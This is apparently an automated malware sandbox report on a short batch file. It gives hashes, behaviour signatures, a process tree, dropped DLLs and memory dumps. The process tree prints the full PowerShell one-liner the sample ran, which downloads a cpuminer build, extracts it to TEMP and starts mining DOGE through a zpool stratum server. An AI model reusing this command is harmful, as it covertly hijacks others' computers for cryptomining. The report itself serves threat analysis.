b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1800s
max time network
1807s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
03/02/2024, 10:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	204	powershell.exe
4	204	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1432	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1432	cpuminer-sse2.exe
1432	cpuminer-sse2.exe
1432	cpuminer-sse2.exe
1432	cpuminer-sse2.exe
1432	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
204	powershell.exe
204	powershell.exe
204	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	204	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4296 wrote to memory of 204	4296	cmd.exe	75
PID 4296 wrote to memory of 204	4296	cmd.exe	75
PID 204 wrote to memory of 2256	204	powershell.exe	76
PID 204 wrote to memory of 2256	204	powershell.exe	76
PID 2256 wrote to memory of 1432	2256	cmd.exe	78
PID 2256 wrote to memory of 1432	2256	cmd.exe	78

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:204
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1432

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgmjhtn3.nap.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
637KB

MD5
784f70a59ad38f3107fec67d684a6122

SHA1
9d579085b4e696c93af960681ab4e3710d3f6207

SHA256
9ba4273c809d92d4233b7fcc6f4d9c1bf89e5163eeb551fd0dc7c5d62b475616

SHA512
93ab2c8c55497bcc389840c438da33891ffd86a6755672806f54f1b0c1318eca41641e4a582116a07f2525c91d3f39bd3e6c7a4cebf45bf2fee9ce10251541bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
593KB

MD5
4d7aec6b22d1db8f3594531f4a237845

SHA1
71695a2f55361d5a6e626528573c3ecb552a352c

SHA256
243536710d81959c33e04ddff13b21149b8db2f3ddd875f49742df93b0e4a98e

SHA512
0a8d399914efbcb89c0e72c43b964b8a0086b92c5fe5b4b5a56c7c6e01cd2e5c6bae8092b78b41eb87af2184127869bc90ebfa4fe940aa1e46983179f1261927

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
300KB

MD5
04ea23ea29f6d2cba72004c7dd4ab470

SHA1
bb1d7e7a036ed10c5f1de5c7213df0fc1d17bee0

SHA256
09ae248b88ef27a05d59991cfc273ed5e41c87b39ce91e0b51c47130f0a67b3d

SHA512
86f6cf9a4315d774ae205f77cc4dfaf3f27e6dde2a224c6a0f55888a49bdf325d27eea8d241d21240379fae1201d625e310edd383dc26534ce4003ecfe4458db

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
589KB

MD5
6fc8e4914458ef6ac594a04e01005f8c

SHA1
656e2c0d29eb0d6bed0e97d3ac70381b6a0c1b25

SHA256
7a3cf68463451d20364b4b4b47a57bfb630396e0eaed63bc6cd9a7f2121f1611

SHA512
0a6353fed3afcf67e96cc8aa86eab857fa58dba0d8eb2a47da5404131c8a1b54ae0cc0682cf635ad776803cb6efd9452950b9c0d623eeec78164de02fdc53711

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
660KB

MD5
041647cf492808f16ab0e1f1644f0bf7

SHA1
a3744c2a5cbe198da69de758ca0843a4aa802d87

SHA256
bc55e0e70dd4861a8b52c2038e0c44fb3e9334e9079d79a401b31e2c319c181f

SHA512
e3b900e876e770129bf438a768c9d12f403bcafa2bcca58816cd84fcb703a5d8b06b05e2ddbd4231d8fb9efa120f15d16d42846136bf8faff7165966177d3f61

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
259KB

MD5
aadb714d75b37753857ca43d0f4b82cc

SHA1
4c9223e0821ceaea058c769a7cef06a6a5a5b40c

SHA256
fde72a8e7e0e6331e082faaab40cbaa648fb38ce0d607a95103549f7d69bae8f

SHA512
4bec45781904bfd9e069d53ff30c1df3578878e855fbecad9c9f4dd3cb9ee3ea621f38643d5b9963de814d9e8fb3cb7abe8d601621ea366606fdd134c9905433

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
309KB

MD5
a934921c0388cf46096a803afebf1e8e

SHA1
3e1b96c27e20ca71010c983af981d3debf444f37

SHA256
55c5b676d2df786ebe0cf6b4c769dfa1522ea25d4156954bd3934f84e11f93f2

SHA512
baf45515fc1136bf2b86b690cb8e5f31c3418c06bad79ef9e05ab44be7e3720b6fcabfaad42b289ec04acc6e583fb00e324c3385acd4eae8cdb58b7892219903

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
373KB

MD5
c3d46df45f185f8a58cf26449e70e559

SHA1
f9dc100abcf36e0d9351dcf5c3334caee1bfe6fa

SHA256
d237158d4a02871d0e605f2bc5f43ca9a8b0d8a70ccdd3ceae2ff2dcf895bef2

SHA512
901492daacab138433d6391859ec0bb7162535290e234463610e34b634d3b0112e88d056ea21a161bcf3fa54f2583a7df4b9911649b21620cb5259a212d66eff

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
376KB

MD5
b1c0d06f72fc09422bb4ad337372e7e6

SHA1
dda928bdda3961415f09b99e0ada7227eef28a56

SHA256
355f1cc0b133887904ed732d946513321963f5c5a0d208329e95ed8195834259

SHA512
a07f69c16e44d67341b9a657d2a2c725c70198d37154f18fb96df3563b8b18377994c7468a292ff263840b93dda4776ce40214aa199dd6c7685898b089f84c74

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
211KB

MD5
73e7b436354612890085cf0f348a6d0f

SHA1
17c721cdf992d463b65b4c020cd562713983dfd4

SHA256
edcf004e3917ee6538d4f64a88ebf8be0ad2c12ea0fb28c7965f1dad288bac2e

SHA512
cece0d88191c35a20d6442533d0c796968a817afc49e3431c5942fab6f4ee8f6bea897778bf7b44d0bd26c7245934586f7787d0853ff1c645e10c31388d7ab3a

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
270KB

MD5
dbe752d654104a7f61bf6547a11d0860

SHA1
8751ff8bd4a48b948bdd5332fc0c777caef74088

SHA256
df6cee4ee91a210618f1fef0b0c667931fc736bc6ecc0f4719913a5a16a6d06e

SHA512
878dda84fbada6bc2c2c7a9a3853e85011d9f663cd2ebcf9b4a7694fcda013ba15bf025727d028c24b3f768b0a18df0e7100761782800631a6edd8bfc77a814f

Download Submit
memory/204-31-0x000001E1F4070000-0x000001E1F4086000-memory.dmp

Filesize
88KB

Download
memory/204-5-0x00007FFCE5EC0000-0x00007FFCE68AC000-memory.dmp

Filesize
9.9MB

Download
memory/204-110-0x00007FFCE5EC0000-0x00007FFCE68AC000-memory.dmp

Filesize
9.9MB

Download
memory/204-65-0x000001E1F3A60000-0x000001E1F3A6A000-memory.dmp

Filesize
40KB

Download
memory/204-52-0x000001E1F4090000-0x000001E1F40A2000-memory.dmp

Filesize
72KB

Download
memory/204-4-0x000001E1F37C0000-0x000001E1F3852000-memory.dmp

Filesize
584KB

Download
memory/204-28-0x000001E1F36C0000-0x000001E1F36D0000-memory.dmp

Filesize
64KB

Download
memory/204-13-0x000001E1F3C00000-0x000001E1F3C76000-memory.dmp

Filesize
472KB

Download
memory/204-10-0x000001E1F3A70000-0x000001E1F3B7E000-memory.dmp

Filesize
1.1MB

Download
memory/204-8-0x000001E1F36C0000-0x000001E1F36D0000-memory.dmp

Filesize
64KB

Download
memory/204-9-0x000001E1F3720000-0x000001E1F3730000-memory.dmp

Filesize
64KB

Download
memory/204-7-0x000001E1F3750000-0x000001E1F3772000-memory.dmp

Filesize
136KB

Download
memory/204-6-0x000001E1F36C0000-0x000001E1F36D0000-memory.dmp

Filesize
64KB

Download
memory/204-82-0x00007FFCE5EC0000-0x00007FFCE68AC000-memory.dmp

Filesize
9.9MB

Download
memory/1432-138-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1432-171-0x0000000074D20000-0x0000000074DB8000-memory.dmp

Filesize
608KB

Download
memory/1432-126-0x0000000074D20000-0x0000000074DB8000-memory.dmp

Filesize
608KB

Download
memory/1432-125-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1432-127-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1432-133-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1432-153-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1432-123-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1432-124-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1432-156-0x0000000074D20000-0x0000000074DB8000-memory.dmp

Filesize
608KB

Download
memory/1432-163-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1432-168-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1432-141-0x0000000074D20000-0x0000000074DB8000-memory.dmp

Filesize
608KB

Download
memory/1432-186-0x0000000074D20000-0x0000000074DB8000-memory.dmp

Filesize
608KB

Download